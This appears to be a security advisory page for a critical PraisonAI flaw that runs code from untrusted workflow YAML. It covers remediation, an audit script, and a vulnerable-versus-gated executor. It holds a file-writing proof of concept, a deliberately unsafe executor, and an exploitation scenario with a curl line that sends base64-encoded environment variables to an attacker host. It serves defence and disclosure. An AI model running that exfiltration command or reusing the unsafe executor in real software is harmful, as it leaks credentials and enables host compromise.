GHSA-vc46-vw85-3wvm: PraisonAI: RCE via malicious workflow YAML execution

GHSA-vc46-vw85-3wvm CRITICAL
Published April 10, 2026
CISO Take

PraisonAI's workflow engine executes shell commands and Python code embedded in any YAML file passed to `praisonai workflow run`, with no sandboxing, provenance check or input validation. The advisory rates it CVSS 9.8 (no privileges, no user interaction); in practice the attacker's one prerequisite is getting the file in front of the runner, via a shared repository, a CI/CD pipeline that executes workflows from pull requests, or social engineering of a developer. Once the file runs, the result is arbitrary code execution on the host. The package carries 41 prior CVEs, a pattern of security debt that compounds the risk. Patch to praisonai ≥ 4.5.139 and praisonaiagents ≥ 1.5.140 immediately, audit every YAML workflow file your pipelines execute for `run:`, `script:` and `python:` steps introduced by untrusted contributors, and restrict workflow sources to reviewed, version-controlled files until patched.

Sources: GitHub Advisory, ATLAS, NVD

Risk Assessment

CRITICAL. CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) reflects the full blast radius: any environment that runs PraisonAI workflows against externally sourced YAML is fully exploitable. Note that the vector scores the attack as network-reachable with no user interaction; strictly, a victim or a CI job still has to run the file, so the practical exposure is every pipeline or workstation that executes workflows it did not author. In CI/CD contexts, the primary use case for AI agent orchestration, this is a direct supply chain attack vector with a near-zero exploitation barrier. The 41 prior CVEs in the same package indicate systemic security debt that warrants scrutiny beyond this single vulnerability. There is no CISA KEV listing yet, but the exploit primitive is trivial and CI usage is widespread, so active exploitation should be planned for rather than waited on.

Attack Kill Chain

  1. Artifact Delivery (AML.T0011.000): Adversary crafts a malicious YAML workflow file with `run:`, `script:`, or `python:` directives and delivers it via a shared repository, a CI/CD pull request, or social engineering.
  2. User Execution (AML.T0011): The victim or an automated CI job executes `praisonai workflow run <malicious.yaml>`; JobWorkflowExecutor parses and processes the untrusted YAML without validation.
  3. Command Execution (AML.T0050): PraisonAI passes `run:` values to subprocess.run(), evaluates `script:` content via exec(), and runs `python:` scripts, giving arbitrary OS and Python code execution on the host.
  4. Host Compromise (AML.T0072): The attacker exfiltrates AI API keys and cloud credentials from environment variables, establishes persistence, and moves laterally to connected AI infrastructure.

Affected Systems

Package          Ecosystem  Vulnerable Range  Patched
PraisonAI        pip        <= 4.5.138        4.5.139
praisonaiagents  pip        <= 1.5.139        1.5.140

Severity & Risk

CVSS 3.1: 9.8 / 10
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Trivial

Attack Surface

Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

Recommended Action

  1. IMMEDIATE: Upgrade praisonai to ≥ 4.5.139 and praisonaiagents to ≥ 1.5.140.
  2. AUDIT: Review all YAML workflow files in CI/CD pipelines and repositories for malicious `run:`, `script:`, or `python:` entries.
  3. RESTRICT: Allowlist YAML sources — execute workflows only from trusted, version-controlled repositories with signed commits.
  4. SANDBOX: Run praisonai workflow commands in isolated containers with minimal privileges and no access to sensitive credentials or production networks.
  5. DETECT: exec() of inline Python is invisible to the OS, so alert on what is observable: unexpected child processes (shells, curl, wget, `python -c`) spawned by praisonai processes, and outbound connections from CI runners to hosts outside their dependency allowlist.
  6. ROTATE: If praisonai has been running in CI, rotate all credentials accessible from that environment as a precaution.
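A static audit helper for the AUDIT step, added here as an example; it is not PraisonAI code or tooling. It parses workflow files with PyYAML's safe loader and reports every `run:`, `script:` or `python:` step in a `type: job` document, descending into nested lists and mappings so a step hidden under another key is still found. The `Finding` type and the two sample documents are constructed for this example; `scan_file` and `scan_tree` assume PyYAML is installed, while `scan_document` works on already-parsed data without it.

```python
"""Audit helper (added example): find code-executing steps in PraisonAI job workflows.

Reports every `run:`, `script:` or `python:` directive in `type: job` documents,
walking nested lists/mappings so a step hidden under e.g. a `parallel:` key is found.
"""
from __future__ import annotations

import os
import sys
from dataclasses import dataclass
from typing import Any, Iterator

# The three directives the advisory identifies as code sinks in JobWorkflowExecutor.
CODE_SINKS = ("run", "script", "python")


@dataclass(frozen=True)
class Finding:
    path: str
    workflow: str
    step: str
    directive: str
    payload: str  # first line of the command / script, for the report


def _iter_steps(node: Any) -> Iterator[dict]:
    """Yield every mapping carrying a code sink, descending into nested structures."""
    if isinstance(node, dict):
        if any(k in node for k in CODE_SINKS):
            yield node
        for value in node.values():
            yield from _iter_steps(value)
    elif isinstance(node, list):
        for item in node:
            yield from _iter_steps(item)


def scan_document(doc: Any, path: str = "<memory>") -> list[Finding]:
    """Return one Finding per code sink in a parsed workflow document.

    Per the advisory only `type: job` documents reach JobWorkflowExecutor, so other
    document types are skipped; drop this filter if that routing ever changes.
    """
    if not isinstance(doc, dict) or doc.get("type") != "job":
        return []
    workflow = str(doc.get("name", "<unnamed>"))
    findings: list[Finding] = []
    for step in _iter_steps(doc.get("steps", [])):
        for directive in CODE_SINKS:
            if directive in step:
                first_line = (str(step[directive]).strip().splitlines() or [""])[0]
                findings.append(Finding(path, workflow, str(step.get("name", "<unnamed step>")),
                                        directive, first_line))
    return findings


def scan_file(path: str) -> list[Finding]:
    """Parse one file (all YAML documents) with the safe loader and scan it."""
    import yaml  # PyYAML; imported lazily so scan_document works without it

    with open(path, encoding="utf-8") as fh:
        return [f for doc in yaml.safe_load_all(fh) for f in scan_document(doc, path)]


def scan_tree(root: str) -> list[Finding]:
    """Scan every .yaml/.yml under root, e.g. a checked-out repository."""
    findings: list[Finding] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith((".yaml", ".yml")):
                findings.extend(scan_file(os.path.join(dirpath, name)))
    return findings


# Constructed samples: the advisory's PoC as a parsed dict, and a benign non-job document.
SAMPLE_EXPLOIT = {
    "type": "job",
    "name": "exploit",
    "steps": [{"name": "write-file",
               "run": "python -c \"open('pwned.txt','w').write('owned')\""}],
}
SAMPLE_BENIGN = {"type": "agent", "name": "helper", "steps": [{"name": "greet", "run": "id"}]}

if __name__ == "__main__":
    hits = scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".")
    for f in hits:
        print(f"{f.path}: workflow={f.workflow!r} step={f.step!r} {f.directive}: {f.payload}")
    sys.exit(1 if hits else 0)
```

Run it as a CI gate (`python audit_workflows.py path/to/repo`) so a pull request that adds or changes a code-executing step fails the build and gets a human review; a non-zero exit is the signal. Every hit is a step that will run with the CI runner's credentials, so treat the report as a list of things to read, not a list of things to grep away.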

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 9 - Risk Management System
ISO 42001
A.6.1.4 - AI system supply chain security
NIST AI RMF
GOVERN 1.7 - Processes and policies for AI risk management
OWASP LLM Top 10
LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is GHSA-vc46-vw85-3wvm?

A critical (CVSS 9.8) vulnerability in PraisonAI's workflow engine: `praisonai workflow run` executes the `run:`, `script:` and `python:` steps of any `type: job` YAML file it is given, so an attacker who can get a crafted workflow file executed (through a shared repository, a CI/CD pipeline or social engineering) gets arbitrary code execution on the host. Fixed in praisonai 4.5.139 and praisonaiagents 1.5.140; see the CISO Take above for context.

Is GHSA-vc46-vw85-3wvm actively exploited?

No confirmed active exploitation of GHSA-vc46-vw85-3wvm has been reported, but organizations should still patch proactively.

How to fix GHSA-vc46-vw85-3wvm?

Upgrade praisonai to ≥ 4.5.139 and praisonaiagents to ≥ 1.5.140, then work through the Recommended Action list above: audit workflow YAML for `run:`, `script:` and `python:` steps, restrict workflow sources to reviewed, version-controlled repositories, sandbox the runner, alert on unexpected child processes spawned by praisonai, and rotate any credentials exposed to CI runners that executed untrusted workflows.

What systems are affected by GHSA-vc46-vw85-3wvm?

Any host running praisonai <= 4.5.138 or praisonaiagents <= 1.5.139 that executes `praisonai workflow run` on a YAML file it did not author. The deployment patterns most exposed are agent frameworks, CI/CD pipelines, multi-agent orchestration, and training pipelines that invoke the workflow CLI.

What is the CVSS score for GHSA-vc46-vw85-3wvm?

GHSA-vc46-vw85-3wvm has a CVSS v3.1 base score of 9.8 (CRITICAL).

Technical Details

NVD Description

`praisonai workflow run <file.yaml>` loads untrusted YAML and, if `type: job`, executes steps through `JobWorkflowExecutor` in job_workflow.py. This supports:

- `run:` → shell command execution via `subprocess.run()`
- `script:` → inline Python execution via `exec()`
- `python:` → arbitrary Python script execution

A malicious YAML file can execute arbitrary host commands.

Affected Code

- workflow.py → `action_run()`
- job_workflow.py → `_exec_shell()`, `_exec_inline_python()`, `_exec_python_script()`

PoC

Create `exploit.yaml`:

```yaml
type: job
name: exploit
steps:
  - name: write-file
    run: python -c "open('pwned.txt','w').write('owned')"
```

Run:

```bash
praisonai workflow run exploit.yaml
```

Reproduction Steps

1. Save the YAML above as `exploit.yaml`.
2. Execute `praisonai workflow run exploit.yaml`.
3. Confirm `pwned.txt` appears in the working directory.

Impact

Remote or local attacker-supplied workflow YAML can execute arbitrary host commands and code, enabling full system compromise in CI or shared deployment contexts.

Reporter: Lakshmikanthan K (letchupkt)
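The primitive described above, reconstructed as a minimal executor and placed beside one hardened form. This is an added example, not PraisonAI's code and not its patch (the page does not say what the fix does): `UnsafeJobExecutor` does what the description says, `run:` straight into `subprocess.run(shell=True)` and `script:` straight into `exec()`; `GatedJobExecutor` keeps the same step schema but refuses every code-executing step unless the workflow file's SHA-256 digest is on an operator-maintained allowlist. The digest allowlist, the class and function names, and the treatment of `python:` as a script file run with the current interpreter are assumptions of the example; the sample step and file bytes are constructed.

```python
"""Vulnerable-vs-hardened step executor (added example, not PraisonAI's code).

UnsafeJobExecutor reconstructs the primitive the advisory describes: `run:` goes
straight to subprocess.run(shell=True) and `script:` straight to exec().
GatedJobExecutor keeps the same step schema but only executes code for workflows
whose SHA-256 digest the operator has allowlisted; anything else is refused.
"""
from __future__ import annotations

import hashlib
import subprocess
import sys
from dataclasses import dataclass, field

CODE_SINKS = ("run", "script", "python")


class UntrustedWorkflowError(RuntimeError):
    """A workflow asked for code execution without an operator trust grant."""


@dataclass
class StepResult:
    name: str
    directive: str
    output: str


def _execute(step: dict) -> StepResult:
    """Shared sink dispatch; both executors call this once a step is allowed to run."""
    name = str(step.get("name", "<unnamed>"))
    if "run" in step:  # shell command, as described: subprocess.run()
        proc = subprocess.run(step["run"], shell=True, capture_output=True, text=True, check=False)
        return StepResult(name, "run", proc.stdout)
    if "script" in step:  # inline Python, as described: exec()
        ns: dict = {}
        exec(step["script"], ns)
        return StepResult(name, "script", str(ns.get("result", "")))
    if "python" in step:  # assumed: a script path run with the current interpreter
        proc = subprocess.run([sys.executable, step["python"]], capture_output=True, text=True, check=False)
        return StepResult(name, "python", proc.stdout)
    return StepResult(name, "noop", "")


class UnsafeJobExecutor:
    """Whatever the YAML says, run it (the behaviour GHSA-vc46-vw85-3wvm describes)."""

    def run_steps(self, steps: list[dict]) -> list[StepResult]:
        return [_execute(step) for step in steps]


@dataclass
class GatedJobExecutor:
    """Code runs only if the workflow bytes hash to an operator-allowlisted digest.

    `trusted_digests` is the operator's record of reviewed workflow files (assumed to
    be pinned in config or a signed lockfile). An unknown workflow is checked in full
    before anything runs, so no step executes if any step would be refused.
    """
    trusted_digests: frozenset[str] = field(default_factory=frozenset)

    @staticmethod
    def digest(workflow_bytes: bytes) -> str:
        return hashlib.sha256(workflow_bytes).hexdigest()

    def is_trusted(self, workflow_bytes: bytes) -> bool:
        return self.digest(workflow_bytes) in self.trusted_digests

    def run_steps(self, steps: list[dict], workflow_bytes: bytes) -> list[StepResult]:
        offending = [s for s in steps if any(k in s for k in CODE_SINKS)]
        if offending and not self.is_trusted(workflow_bytes):
            names = [str(s.get("name", "<unnamed>")) for s in offending]
            raise UntrustedWorkflowError(
                f"steps {names} execute code but workflow digest "
                f"{self.digest(workflow_bytes)[:12]}... is not allowlisted")
        return [_execute(step) for step in steps]


def refuses(executor: GatedJobExecutor, steps: list[dict], workflow_bytes: bytes) -> bool:
    """True if the gated executor refuses the workflow outright."""
    try:
        executor.run_steps(steps, workflow_bytes)
    except UntrustedWorkflowError:
        return True
    return False


# Constructed sample: one `script:` step and the bytes of the file it was parsed from.
SAMPLE_STEPS = [{"name": "calc", "script": "result = 6 * 7"}]
SAMPLE_FILE = b"type: job\nname: demo\nsteps:\n  - name: calc\n    script: result = 6 * 7\n"

if __name__ == "__main__":
    print("unsafe:", UnsafeJobExecutor().run_steps(SAMPLE_STEPS)[0].output)
    print("gated, unknown digest refuses:", refuses(GatedJobExecutor(), SAMPLE_STEPS, SAMPLE_FILE))
    reviewed = GatedJobExecutor(frozenset({GatedJobExecutor.digest(SAMPLE_FILE)}))
    print("gated, reviewed digest:", reviewed.run_steps(SAMPLE_STEPS, SAMPLE_FILE)[0].output)
```

The point of the gate is that a workflow file is code, so the decision to run it has to be made on provenance, not on the file's contents: a one-byte change to a reviewed file (a new `run:` step appended in a pull request) changes the digest and is refused until someone re-reviews and re-pins it. Sandboxing the runner remains necessary for the trusted path, since an allowlisted workflow still runs with whatever the process can reach.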

Exploitation Scenario

An adversary targeting an organization's AI development pipeline uploads a malicious `automation.yaml` to a shared workflow repository or submits it in a pull request that a CI/CD job picks up. The file contains a `type: job` step with `run: curl attacker.com/exfil -d "$(env | base64)"`, which silently exfiltrates every environment variable, including OpenAI API keys, AWS credentials and database connection strings, the moment a developer or automated job runs `praisonai workflow run automation.yaml`. The only prerequisite is that someone or something runs the file; no authentication to the victim host and no knowledge of its internals is needed. In multi-agent deployments where PraisonAI orchestrates downstream AI tools, the blast radius extends to all connected systems and their credentials.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
April 10, 2026
Last Modified
April 10, 2026
First Seen
April 10, 2026
